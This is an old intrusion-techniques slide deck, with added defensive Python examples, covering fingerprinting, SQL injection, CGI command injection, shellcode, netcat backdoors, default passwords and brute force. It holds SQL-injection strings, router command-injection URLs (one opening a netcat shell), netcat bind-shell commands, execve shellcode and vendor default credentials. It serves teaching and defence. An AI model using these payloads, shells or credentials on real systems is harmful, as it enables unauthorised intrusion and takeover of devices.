Intrusion Techniques
DcLabs Hacking Tour 2010

Ewerson Guimarães (Crash)
Rener Silva (Gr1nch)
Agenda

FingerPrint
Web-Bugs
Backdoors
Brute Force
ShellCode
Exploits
Sniffers
Scanners/Fuzzers
MetaSploit
IIS SemiColon
Man-in-the-Middle
FingerPrint

Grab information about a target host.
Ex: it is used to identify the operating system and/or service (daemon)
version numbers from the unique characteristics of the host's TCP/IP responses.

The best tool for discovering operating systems, services,
devices and more: NMAP (Network Mapper)

Basic commands:

nmap host (basic scan)
nmap -sV host (service versions)
nmap -P0 host (no ping: don't wait for an ICMP echo reply)
nmap -O host (try to guess the O.S. version)
nmap -f host (fragmented packets for Firewall/IDS/IPS evasion)
Passive FingerPrint

• TTL - the Time To Live the operating system sets on outbound packets
• Window Size - the TCP Window Size the operating system sets
• DF - whether the operating system sets the Don't Fragment bit
• TOS - whether the operating system sets the Type of Service, and if so, to what value
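Added example, not from the deck: a minimal passive fingerprinter that pulls the four fields above out of a raw IPv4+TCP SYN and matches them against a signature table. The packet builder and the signature values are constructed for illustration (they are not a real p0f or nmap database).

```python
import struct

# Illustrative signature table, constructed for this example (it is not a real
# p0f or nmap database): initial TTL, DF bit and initial TCP window size.
SIGNATURES = [
    {"os": "Linux 2.6 (typical)",  "ttl": 64,  "df": True, "window": 5840},
    {"os": "Windows XP (typical)", "ttl": 128, "df": True, "window": 65535},
    {"os": "FreeBSD (typical)",    "ttl": 64,  "df": True, "window": 65535},
]

def build_syn(ttl, tos, df, window):
    """Constructed sample packet: minimal IPv4 header + TCP SYN, no options,
    checksums left at zero (we only parse it, we never send it)."""
    flags_frag = 0x4000 if df else 0           # DF is bit 14 of the flags/fragment word
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, tos, 40, 1, flags_frag, ttl, 6, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    tcp = struct.pack("!HHIIHHHH", 40000, 80, 1, 0, (5 << 12) | 0x02, window, 0, 0)
    return ip + tcp

def parse_ip_tcp(packet):
    """Extract the passive-fingerprint fields from a raw IPv4+TCP packet."""
    ver_ihl, tos, _len, _id, flags_frag, ttl, proto = struct.unpack("!BBHHHBB", packet[:10])
    if ver_ihl >> 4 != 4 or proto != 6:
        raise ValueError("not an IPv4/TCP packet")
    ihl = (ver_ihl & 0x0F) * 4
    # TCP header: sport(2) dport(2) seq(4) ack(4) offset+flags(2) window(2)
    _sp, _dp, _seq, _ack, off_flags, window = struct.unpack("!HHIIHH", packet[ihl:ihl + 16])
    syn_only = bool(off_flags & 0x02) and not (off_flags & 0x10)
    return {"ttl": ttl, "tos": tos, "df": bool(flags_frag & 0x4000),
            "window": window, "syn": syn_only}

def initial_ttl(observed):
    """Round the observed TTL up to the nearest common starting value,
    since every router hop on the way decremented it by one."""
    for start in (32, 64, 128, 255):
        if observed <= start:
            return start
    return 255

def guess_os(fields):
    """Return the OS labels whose signature matches the SYN's TTL, DF and window."""
    if not fields["syn"]:
        return []   # the initial window size is only reliable on the first SYN
    ttl0 = initial_ttl(fields["ttl"])
    return [s["os"] for s in SIGNATURES
            if s["ttl"] == ttl0 and s["df"] == fields["df"] and s["window"] == fields["window"]]
```

The same parser run over a live capture (for example from a raw socket or a pcap reader) is what lets a defender inventory which operating systems are talking on a segment without touching them.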
FingerPrint - Matrix:

FingerPrint - U. Bourne
Web Vulnerability

These vulnerabilities are initially exploited through malicious browser
requests, compromising the target in a matter of minutes:

SQL-Injection
Cross Site Scripting (XSS)
Cross Site Request Forgery (CSRF)
CGI Command Injection
PHP-Injection
Web Vulnerability

SQL-Injection

It occurs when the attacker can insert a series of SQL statements within a query
by manipulating the data the application accepts as input.

SELECT campos FROM tabela WHERE campo = 'test@test.com';

Inject string: some' OR 'x'='x
SELECT fields FROM table WHERE field = 'some' OR 'x'='x';

Common test strings:

admin'--            " or 0=0 #           ' or 1=1--           hi' or 'a'='a
' or 0=0 --         or 0=0 #             " or 1=1--           hi') or ('a'='a
" or 0=0 --         ' or 'x'='x          or 1=1--             hi") or ("a"="a
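Added example, not from the deck: the slide's query written the vulnerable way (string concatenation) next to the fixed way (a bound parameter), run against a constructed in-memory SQLite table so the effect of the `some' OR 'x'='x` string can be seen directly.

```python
import sqlite3

INJECT = "some' OR 'x'='x"      # the slide's injection string

def make_db():
    """Constructed sample data standing in for the slide's 'table'/'field'."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (email TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("test@test.com", "user"), ("admin@test.com", "admin")])
    return con

def lookup_vulnerable(con, email):
    """Builds the query by string concatenation, exactly like the slide's
    SELECT ... WHERE field = '<input>'. A quote in the input closes the
    literal, so  some' OR 'x'='x  turns the WHERE clause into a tautology
    and every row comes back."""
    sql = "SELECT email FROM users WHERE email = '" + email + "'"
    return sorted(row[0] for row in con.execute(sql))

def lookup_safe(con, email):
    """Parameterised query: the input travels to the engine as a bound value,
    never as SQL text, so the same string simply matches no row."""
    cur = con.execute("SELECT email FROM users WHERE email = ?", (email,))
    return sorted(row[0] for row in cur)
```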
Web Vulnerability

CGI Command Injection

It occurs when the attacker inserts a series of shell commands into the
parameters of a vulnerable CGI script:

Nagios:
https://www.xxx.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+%24PATH

DD-WRT:
http://www.xxx.com/cgi-bin/;nc$IFS-l$IFS-p$IFS5555$IFS-e$IFS/bin/sh

Linksys Wireless:
/setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1
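Added example, not from the deck: the defender's side of the three requests above. One function shows how a CGI ping action should take its target (parse it as a literal IP address and hand an argv list to the process, never a shell command line); the other is a cheap access-log check that flags shell metacharacters in a decoded request target. The sample request lines are constructed from the slide's examples plus one legitimate request.

```python
import ipaddress
from urllib.parse import parse_qs, unquote_plus, urlsplit

SHELL_META = (";", "|", "`", "$(", "$IFS", "&&", "\n")

def ping_argv_from_query(url, param="ping"):
    """Build an argv for the CGI's ping action. The parameter must parse as a
    literal IP address, and the result is meant for subprocess.run(argv) with
    no shell, so ';' or '$IFS' never get interpreted. Returns None when the
    parameter is missing, repeated, or not an IP address."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(param, [])
    if len(values) != 1:
        return None
    try:
        target = ipaddress.ip_address(values[0])   # rejects "173.45.235.65;echo $PATH"
    except ValueError:
        return None
    return ["ping", "-c", "1", str(target)]

def looks_like_command_injection(request_target):
    """Access-log check: shell metacharacters anywhere in the decoded path or
    query of a CGI request are worth an alert."""
    parts = urlsplit(request_target)
    decoded = unquote_plus(parts.path) + "?" + unquote_plus(parts.query)
    return any(meta in decoded for meta in SHELL_META)

# Constructed access-log request targets: the first three follow the slide's
# Nagios, DD-WRT and Linksys examples, the last is a legitimate diagnostics request.
SAMPLE_REQUESTS = [
    "/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+%24PATH",
    "/cgi-bin/;nc$IFS-l$IFS-p$IFS5555$IFS-e$IFS/bin/sh",
    "/setup.cgi?todo=ping_test&c4_ping_ipaddr=1.1.1.1;/bin/ps+aux&message=",
    "/setup.cgi?todo=ping_test&c4_ping_ipaddr=1.1.1.1&message=",
]

def flag_requests(requests):
    """Return the subset of request targets that trip the metacharacter check."""
    return [r for r in requests if looks_like_command_injection(r)]
```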
ShellCode Introduction

#include <stdio.h>
#include <unistd.h>

/* The C version: spawn a shell with execve(). */
int main(void) {
    char *comando[2];
    comando[0] = "/bin/sh";
    comando[1] = NULL;
    execve(comando[0], comando, NULL);
    return 0;
}

/* The same execve("/bin/sh") as raw 32-bit x86 Linux machine code. */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x0a\x31\xc0\x88\x46\x09\x89\x46\x0e\xb0\x0b\x89"
    "\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
    "\xdc\xff\xff\xff/bin/sh";
Exploits

Kinds of Exploits:

Local: usually the objective of a local exploit is to elevate the user's
privileges on the machine as close as possible to root (uid=0) or
Administrator. They are written to exploit kernel bugs or suid binaries.

Remote: works over a network connection and exploits the
vulnerable target without any prior access to it.

www.securityfocus.com
www.milw0rm.com
www.secunia.com
www.exploit-db.com

0-Days: usually an unpublished exploit for a brand-new
vulnerability. You can buy them! $$$$$
Backdoors/RootKits

Used to maintain access to the system.

We can use Netcat for this purpose:

nc -vv -l -p 5555
nc -vv -l -p 5555 -e /bin/bash
nc <ip> <port>

RootKits

The main purpose of a rootkit is to hide the attacker's presence by replacing vital
system binaries on the target system.
Examples:
Hide files (whose names match given strings)
Run a command when a string matches
Hide processes
Hide open ports, and others.
Default/Weak passwords

Default passwords are set by the manufacturer/developer and were not
changed after installation/configuration.

As supplied by the system vendor and meant to be changed at
installation time (nobody does this shit).

Ex: 3Com switch:
User: security
Pass: security

FireBird:
User: sysdba
Pass: masterkey

Weak: passwords that are easily guessed or follow a keyboard sequence.
Ex:
123456
love
Home phone number
Birthday
Etc...
Brute Force

It consists of trying random combinations of characters/numbers and
symbols, wordlists and/or string generators to crack a password.
Ex:

John the Ripper
Hydra
SSH Brute Force

DirBuster - a multi-threaded Java application designed to brute force directory
and file names on web/application servers.
Scanners/Fuzzers

There are 2 types of scanners: specific ones, written for a specific
vulnerability (BSQLHacker, SQLMAP), and generic ones, written for
various kinds of vulnerabilities. Generic scanners use known service
banners/strings to locate potential targets/vulnerabilities.

Examples:
Saint
W3af
Nexpose Community
Sniffers

A sniffer monitors and analyzes network traffic. Some of these packets
may contain critical information (such as logins, passwords and other cool info).
Wireshark
DoS

Denial of Service consists of attempts to prevent valid users from using a
particular feature, or simply to take it down.

SYN FLOOD
UDP Packet Storm
DDoS
Smurf Attack
MetaSploit

IIS SemiColon

Secure it? Wtf?

Man-in-the-Middle
Hardening your server

HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system
for vulnerabilities or problems in configuration files, giving you a quick
overview of the security status of your system.

http://hntool.net
UAI?

crash@dclabs.com.br
gr1nch@dclabs.com.br

irc.freenode.net
#dclabs
#securityguys
